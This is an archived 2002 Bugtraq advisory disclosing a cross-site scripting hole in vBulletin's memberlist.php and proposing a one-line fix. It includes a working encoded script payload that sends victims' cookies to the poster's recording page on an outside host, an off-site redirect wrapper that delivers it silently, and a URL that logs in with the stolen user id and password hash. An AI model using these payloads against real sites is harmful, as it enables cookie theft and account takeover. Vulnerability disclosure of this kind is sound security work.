[24803] in bugtraq
memberlist.php of vBulletin
daemon@ATHENA.MIT.EDU (plato@swgmotu.com)
Fri Mar 22 19:03:12 2002
From: <plato@swgmotu.com>
To: <bugtraq@securityfocus.com>
Date: Thu, 21 Mar 2002 19:26:36 -0500
Message-ID: <!~!AAAAADM3JAkjFDdDpdUmC3xh/T9EfyEA@swgmotu.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_001A_01C1D10E.518829F0"
------=_NextPart_000_001A_01C1D10E.518829F0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
vBulletin ALL versions
Vendor status: notified 3/18/2; no response
=20
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaled. Because of the way PHP initializes variables, we =
can
inject HTML, or JavaScript into the document. So by directing a user =
to,
for example:
http://www.vbulletin.com/forum/memberlist.php?letterbits=3D%3Cscript%3Elo=
catio
n%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%=
27%
2Bescape%28document%2Ecookie%29%3C%2Fscript%3E(vbulletin.com has =
apparently
patched their installation somehow), I can steal the users password hash =
and
user id. Because of the way vB parses urls, the above will not function
inside the forum, but if we put this in an off-site html file:
<script>
location =3D
"http://www.vbulletin.com/forum/memberlist.php?letterbits=3D%3Cscript%3El=
ocati
on%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D=
%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
and then link to it instead, the exploit will work as intended...the =
user
doesn't even have to be aware of what has transpired...the above link =
will
proceed first to the memberlist w/cookie stealing code, and then to my
<shameless plug>Star Wars Galaxies Player Association's homepage.
http://www.swgmotu.com <http://www.swgmotu.com/> </shameless plug>
=20
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=3D[user
id]&bbpassword=3D[password hash]
=20
I have tried this successfully on five other users besides myself(all =
with
consent).
=20
I believe the simplest fix would be to initialized =
letterbits($letterbits =3D
"";) at the top of memberlist.php.
=20
~Plato
=20
------=_NextPart_000_001A_01C1D10E.518829F0--
